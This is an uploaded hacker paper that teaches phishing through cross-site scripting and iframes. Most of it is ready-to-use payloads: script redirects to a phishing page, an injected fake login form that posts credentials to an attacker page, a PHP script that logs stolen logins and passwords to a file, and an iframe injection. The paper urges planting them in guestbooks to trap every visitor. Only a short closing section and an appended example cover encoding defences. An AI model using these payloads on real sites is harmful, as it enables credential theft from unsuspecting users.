XSS & Iframe Phishing Techniques

This document discusses different phishing techniques using cross-site scripting (XSS) and iframes. It describes XSS redirect phishing, XSS HTML injection phishing, and iframe phishing. It also provides examples of exploiting each technique and includes screenshots. The document concludes with a section about securing websites against these phishing techniques by using HTML encoding to prevent XSS vulnerabilities.

Uploaded by

Nermin Huskić
  • Introduction
  • XSS Redirect Phishing
  • XSS HTML Inject Phishing
  • Iframe Phishing
  • Secure

By 599eme Man

Xss & Iframe Phishing Paper


Xss & Iframe Phishing

Introduction :
In this paper, you will learn about the different kinds of phishing built on XSS and iframes.
XSS gives the opportunity to interact with the targeted user (redirects, cookies, phishing, etc.).
Here you will see:

  • Xss Redirect Phishing
  • Xss Html Inject Phishing
  • Iframe Phishing
  • How to Secure It

About me : 599eme Man


Flouf@[Link]

Special Thanks : Str0zen, [Link], Sheiry, Pr0h4ck3rz & Security-shell

Xss Redirect Phishing

Redirect phishing consists of redirecting the victim to a fake page that steals the victim's login, like a regular
phishing page, except that the redirect goes from the real website to our phishing page.

Example :

- Vulnerable site :

[Link]

- Xss redirect exploiting :

[Link]
search="'><script>[Link]="[Link]
// Replace [Link] by your phishing page address

If the website contains a persistent XSS vulnerability, for example in a guestbook, write and submit the payload, and
all users who visit the guestbook will be redirected to your page.

<script>[Link]="[Link]
>
// Replace [Link] by your phishing page address

Xss Html inject Phishing

XSS HTML injection consists of injecting the code of a fake login page through the URL to create a phishing page ON
the site itself.

Example :

- Vulnerable site :

[Link]

- Xss Html inject exploiting :

[Link]
content="text/html; charset=ISO-8859-1"http-equiv="content-type"
/><title></title></head><body><div style="text-align: center;"><form
Method="POST" Action="[Link]" Name="form">Phishingpage :<br /><br
/>Login :<br />&nbsp;<input name="login" /><br />Password :<br
/>&nbsp;<input name="Password" type="password" /><br /><br /><input
name="Valid" value="Ok !" type="submit" /><br /></form></div></body></html>
// Replace '[Link]' by your phishing page

Warning: Don't forget to encode it!


If the website contains a persistent XSS vulnerability, for example in a guestbook, write and submit the payload, and
all users who visit the guestbook will see the phishing page and may log in on it.

<html><head><meta content="text/html; charset=ISO-8859-1" http-equiv="content-type"
/><title></title></head><body><div style="text-align: center;"><form
Method="POST" Action="[Link]" Name="form">Phishingpage :<br /><br
/>Login :<br />&nbsp;<input name="login" /><br />Password :<br />&nbsp;<input
name="Password" type="password" /><br /><br /><input name="Valid"
value="Ok !" type="submit" /><br /></form></div></body></html>
// Replace '[Link]' by your phishing page

[Link] :

<?php
$login = $_POST['login'];
$password = $_POST['Password'];
$open = fopen('[Link]', 'a+');
fputs($open, 'Login : ' . $login . '<br >' . '
Password : ' . $password . '<br >' . '<br >');
?>

- Xss Html inject Pic :

Iframe Phishing

Iframe phishing is like XSS redirect phishing and HTML inject phishing in one: it's a redirect inside an iframe
on the website.

Example :

- Vulnerable Site :

[Link]

- Iframe Phishing Exploiting :

[Link] src="[Link]
height="300" width="800"></iframe>
// Replace [Link] by your phishing page

Warning: Don't forget to encode it!

As with the other methods, if the website contains a persistent XSS vulnerability, you can inject the iframe code to
trap all visitors.

- Iframe Phishing Pic :

Secure
To protect against XSS/iframe phishing, you need to fix the XSS vulnerability. This is very easy: use
htmlentities.

Example :

- Vulnerable code :

<?php
$var2 = $_GET['var1']; // User input is taken as-is
echo $var2;            // and printed without any encoding
?>

- Secure Code with htmlentities :

<?php
if (isset($_GET['var1'])) // Check that $_GET['var1'] exists; if it does, continue
{
    echo htmlentities($_GET['var1'], ENT_QUOTES); // Print $_GET['var1'] with HTML characters and both quote types encoded
}
?>

- htmlentities($Original, ENT_QUOTES) converts:

$Original    ->    htmlentities($Original, ENT_QUOTES)
'                  &#039;
"                  &quot;
<                  &lt;
>                  &gt;
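
The fix from this section applied to a reflected search parameter like the one in the examples above, as an added example that is not part of the original paper. The function names e() and render_search_page(), the page markup and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Added example: output encoding for a reflected "search" parameter.
// e() and render_search_page() are hypothetical names, not from the paper.

// Encode a value for an HTML body or a quoted attribute value.
function e(string $value): string
{
    // ENT_QUOTES encodes both ' and ", so the value cannot close the attribute.
    // ENT_SUBSTITUTE replaces invalid byte sequences instead of returning "".
    return htmlentities($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_search_page(array $query): string
{
    // Treat a missing or non-string parameter (e.g. search[]=x) as empty.
    $search = isset($query['search']) && is_string($query['search'])
        ? $query['search'] : '';

    // The same value is reflected in two contexts: attribute and body.
    return '<form method="get">'
         . '<input name="search" value="' . e($search) . '" />'
         . '</form>'
         . '<p>Results for: ' . e($search) . '</p>';
}

// Constructed inputs shaped like the three techniques in this paper.
$samples = [
    'redirect' => '"\'><script>/* redirect */</script>',
    'form'     => '"\'><form action="https://phish.example.invalid/">',
    'iframe'   => '"\'><iframe src="https://phish.example.invalid/"></iframe>',
];

foreach ($samples as $name => $payload) {
    $html = render_search_page(['search' => $payload]);
    // After encoding, no markup from the parameter survives in the page:
    // the only <form is the page's own, and no script or iframe tag exists.
    $inert = strpos($html, '<script') === false
          && strpos($html, '<iframe') === false
          && substr_count($html, '<form') === 1;
    echo $name, ': ', $inert ? 'inert' : 'INJECTED', "\n";
}
```

htmlentities() covers values placed in the HTML body or inside a quoted attribute. A value written into a script block, an unquoted attribute, or a URL attribute such as href or src needs encoding or validation specific to that context.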
